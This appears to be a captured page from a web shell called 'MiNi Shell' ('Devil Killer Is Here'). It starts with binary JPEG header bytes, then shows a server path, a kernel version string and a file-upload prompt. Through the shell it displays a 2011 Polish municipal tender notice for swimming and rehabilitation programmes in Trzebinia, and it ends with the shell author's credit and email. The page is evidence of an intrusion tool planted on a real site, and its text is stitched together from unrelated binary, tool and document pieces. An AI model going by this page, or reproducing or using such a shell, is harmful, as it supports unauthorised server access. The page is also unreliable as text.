JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110111/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110111/12175-N-2011.html

<p class="kh_header"><b>Trzebinia: Realizacja programów profilaktyczno-rehabilitacyjnych oraz szkoleniowych</b><br>
<b>Numer ogłoszenia: 12175 - 2011; data zamieszczenia: 11.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Trzebinia , ul. Józefa Piłsudskiego 14, 32-540 Trzebinia, woj. małopolskie, tel. 32 6121227, faks 32 6121147.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.trzebinia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja programów profilaktyczno-rehabilitacyjnych oraz szkoleniowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Program  Powszechna nauka pływania w Gminie Trzebinia
II.Programy zdrowotne: 
Jesteśmy aktywni - przeznaczony dla emerytów i rencistów,
Trzymaj pion - profilaktyka wad postawy i innych schorzeń u dzieci i
młodzieży , mającej wskazania lekarskie do rehabilitacji ruchowej w wodzie,
III.Program  Sprawność i zdrowie na straży bezpieczeństwa publicznego - przeznaczony dla druhów OSP ze szczególnym uwzględnieniem drużyn młodzieżowych. 
Ad I . Program Powszechna nauka pływania w Gminie Trzebinia
1.Miejsce realizacji zamówienia:
Kryta pływalnia wynajęta na wyłączność w godzinach od 8:00 do 14:00 posiadająca basen sportowy (niecka o głębokości od 1,30 m do 1,80 m) oraz basen rekreacyjny przeznaczony do nauki pływania dla dzieci przedszkolnych nie potrafiących pływać.
Dla potrzeb nauki pływania wykorzystywane będą dwa tory skrajne w niecce basenu sportowego oraz basen rekreacyjny tzw. brodzik.

2.Warunki realizacji zamówienia:
- Wykonawca jest zobowiązany do zapewnienia odpowiednich przyborów do 
  nauki pływania w ilości 45 sztuk na każdą godzinę nauki;
- nauka pływania wymaga obecności ratowników zgodnie z obowiązującymi 
  przepisami bezpieczeństwa (za właściwą liczbę ratowników dla 45 osobowej grupy
  uczniów odpowiada kryta pływalnia);
- naukę pływania prowadzą instruktorzy posiadający uprawnienia w zawodzie 
  instruktora pływania i kwalifikacje pedagogiczne;
- na każdą godzinę nauki pływania przypada trzech instruktorów nauki pływania -
  po jednym na każdą 15 osobową grupę;
- nauka pływania trwa 45 minut + 15 minut na korzystanie z szatni (obecność 
  uczniów na basenie liczona od założenia zegarków do zdania zegarków wynosi
  60 minut);
- podczas każdej godziny nauki z basenu będą korzystać 3 grupy po 15 uczniów w
  skład grupy wchodzą uczniowie  uczęszczający do szkół podstawowych, 
  gimnazjów oraz dzieci z przedszkoli samorządowych znajdujących się na terenie 
  Gminy Trzebinia;
- nauka pływania obejmuje dzieci uczące się pływać oraz takie, które potrafią już
  pływać i kontynuują naukę oraz doskonalą już nabyte umiejętności;
- każda 15-osobowa grupa może posiadać max. 2 opiekunów ze szkół i gimnazjów
   natomiast w przypadku 15 osobowej grupy dzieci z przedszkoli dopuszcza się 
  obecność 3 opiekunów (nauczyciel + 2 rodziców);
- rola opiekunów-rodziców sprowadza się do pomocy uczniom oraz dzieciom na
  terenie szatni;
- nauczyciele po wejściu na teren niecki basenowej przekazują grupy uczniów pod
  opiekę instruktorów, którzy odpowiadają za ich bezpieczeństwo podczas nauki 
  pływania w obrębie niecki basenowej, po zakończeniu zajęć nauczyciele przejmują 
  odpowiedzialność za bezpieczeństwo uczniów na terenie szatni i w trakcie 
  dowozu;
- rola nauczycieli szkół, gimnazjów i przedszkoli ograniczy się do roli opiekuńczej
  poza niecką basenu.
- harmonogram nauki pływania ustalany jest przez dyrektorów placówek w
  porozumieniu z pracownikiem Trzebińskiego Centrum Administracyjnego
  sprawującym merytoryczną opiekę nad realizacją programu. Zmiany w 
  harmonogramie przekazywane są Wykonawcy.

3.Termin wykonania zamówienia:
   14.02.2011r - 17.06.2011r.  oraz 12.09.2011 - 16.12.2011r.

Ad.II 
Program Jesteśmy aktywni skierowany do trzebińskich  seniorów.  
1. Zajęcia odbywać się mają  w trzech  grupach w każdy poniedziałek 
    (z wyłączeniem dni świątecznych):
     I  grupa godz.  14.00
    II  grupa godz.  15.00
   III  grupa godz.  16.00 - słuchacze UTW. 
Zajęcia prowadzone będą przez rehabilitanta zatrudnionego przez  Zamawiającego. 
2. Czas przebywania w nieckach basenowych określa się na maksymalnie 60 minut
   dla każdego adresata programu, dodatkowo 10 minut na przebranie. 
3. Koszty korzystania z innych urządzeń (np. sauny) pokrywają adresaci programu. 
4. Wstęp na basen odbywa się  za okazaniem  ZUS-owskiej legitymacji emeryta-
    rencisty wraz z dowodem tożsamości ze zdjęciem (dowód osobisty, prawo jazdy)
     potwierdzającym miejsce zamieszkania.  
5. Adresaci programu to emeryci i renciści - mieszkańcy Gminy Trzebinia.
6. Wykonawca zapewnia  opiekę   ratowników. 
7. Termin realizacji 1 lutego do 19 grudnia 2011 r. (44 poniedziałki). 
    W terminie od 20 czerwca do 31 sierpnia zapewnienie dodatkowej godziny zajęć
    w tygodniu.
8. Planowana liczba  osobowejść 6476. 
9. Zamawiający zastrzega sobie wyłączność w korzystaniu z obiektu przez
   adresatów programu. 

Program Trzymaj pion skierowany do dzieci i młodzieży trzebińskich szkół podstawowych i gimnazjalnych.  

1. Zajęcia odbywać się mają  w  ośmiu   grupach:
    I   grupa	- środa 	1600	duża niecka basenowa +  rezerwacja
                                                   jednego toru, 
    II  grupa	- środa 	1700	duża niecka basenowa +  rezerwacja
                                                   jednego toru, 
   III  grupa	- środa 	1800	duża niecka basenowa +  rezerwacja
                                                   jednego toru,
   IV  grupa	- sobota  900	duża niecka basenowa +  rezerwacja
                                                   jednego toru,
    V  grupa	- sobota 1000	duża niecka basenowa +  rezerwacja
                                                   jednego toru,
  VI   grupa	- sobota 1100	duża niecka basenowa +  rezerwacja
                                                   jednego toru,
 VII   grupa	- sobota 1200 	mała niecka basenowa,
VIII  grupa	- sobota 1300	mała niecka basenowa. 
2. Każda grupa może liczyć maksymalnie  15 osób. 
3. Rehabilitant prowadzący zajęcia zatrudniony jest przez Zamawiającego. 
4. Wykonawca zapewnia  opiekę   ratowników. 
5. Termin realizacji: od 16 lutego  do 18 czerwca  2011r. (z wyłączeniem 
    23 kwietnia 2011 r.) oraz 07 września do 17 grudnia 2011 r.   
6. Czas przebywania w nieckach basenowych określa się na maksymalnie 45 minut
   dla każdego adresata programu, dodatkowo 25 minut na przebranie. 
7. Wstęp na basen odbywa się według przekazanej listy adresatów rehabilitacji. 
8. Wykonawca zapewnia rehabilitantowi sprzęt ułatwiający prowadzenie zajęć (np. 
    deski do pływania, piłeczki, makarony itp.)
9. Planowana liczba  osobowejść 3 885. 

Ad III.
Program Sprawność i zdrowie na straży bezpieczeństwa publicznego-  poprawa kondycji i sprawności fizycznej wśród strażaków ochotników ze szczególnym uwzględnieniem strażackich drużyn młodzieżowych.  
1.Wstęp na basen odbywać się będzie na podstawie imiennej listy oraz 
  potwierdzenia tożsamości przez adresata programu
2.Każdemu  adresatowi przysługuje jeden bezpłatny wstęp na basen  w tygodniu
  od poniedziałku do soboty w godz. 1400 - 21.00(z wyłączeniem dni świątecznych).
3.Koszty korzystania z innych urządzeń pokrywają adresaci programu. 
4.Czas przebywania w nieckach basenowych określa się na maksymalnie 60 minut
  dla każdego adresata programu, dodatkowo 10 minut na przebranie. 
5. Oferent powinien zapewnić opiekę ratowników. 
6.  Planowana  liczba osobowejść 3 245. 
7. Termin realizacji od 1 lutego do 19 grudnia 2011 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Realizacja programów:
Jesteśmy aktywni i Trzymaj pion -   do 25% wartości zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.61.00.00-7, 85.14.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:
1)posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)posiadania wiedzy i doświadczenia;
3)dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4)sytuacji ekonomicznej i finansowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony poprzez wykonanie przez wykonawcę  min. 2 zadań odpowiadających swoim rodzajem przedmiotowi przetargu,  w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony przez dysponowanie obiektem - Krytą pływalnią wynajętą na wyłączność w godzinach od 8:00 do 14:00 posiadającą basen sportowy (niecka o głębokości od 1,30 m do 1,80 m) oraz basen rekreacyjny przeznaczony do nauki pływania dla dzieci przedszkolnych nie potrafiących pływać - dopuszczonym do użytkowania , umożliwiającym wykonanie przedmiotu zamówienia, a także zapewnienie odpowiednich przyborów do nauki pływania, ćwiczeń korekcyjnych i rekreacyjnych w ilości 45 sztuk na każdą godzinę realizacji programów (dot. programów: I, II, III).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony poprzez:
- dysponowanie min. 3 instruktorami nauki pływania, posiadającymi uprawnienia w zawodzie instruktora pływania oraz kwalifikacje pedagogiczne;
- na każdą godzinę nauki pływania przypada trzech instruktorów nauki pływania - po jednym na każdą 15 osobową grupę;
- dysponowanie wymaganą przepisami liczbą ratowników dla zapewnienia wszystkim uczestnikom programów właściwego bezpieczeństwa przez cały czas trwania zajęć.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez posiadanie polisy lub innego dowodu ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 500 000,00 zł .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie art. 22 Prawo zamówień publicznych.
2. Oświadczenie, że Wykonawca dysponuje obiektem dopuszczonym do
   użytkowania umożliwiającym wykonanie przedmiotu zamówienia, a także
   zapewni odpowiednie przybory do nauki pływania, ćwiczeń korekcyjnych i
   rekreacyjnych w ilości 45 sztuk na kazdą godzinę w.w zajęć.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiajacy dopuszcza ewentualne zmiany w umowie w przypadku zmiany:
-Personelu Wykonawcy ( w przypadku zaistnienia okoliczności uzasadniających
 zmianę np. stan zdrowia, rezygnacja z pracy, itp.).
-Harmonogramu realizacji usług  w przypadku zaistnienia okoliczności niżej wymienionych :
- nieobecności  rehabilitanta, spowodowanej chorobą lub innym zdarzeniem
  losowym, 
- dostosowania godzin ćwiczeń rehabilitacyjnych do szkolnych planów lekcji 
  adresatów programu, 
- brak możliwości świadczenia usług przez Wykonawcę spowodowanych awarią
  urządzeń technicznych , brakiem dostawy mediów lub innym zdarzeniem losowym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.trzebinia.pl (BIP)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miasta Trzebini, Wydział Spraw Obywatelskich ul. Narutowicza 10 pok. Nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.01.2011 godzina 10:30, miejsce: Ofertę należy złożyć w Urzędzie Miasta w Trzebini, Wydział Spraw Obywatelskich ul. Narutowicza 10 pok. Nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com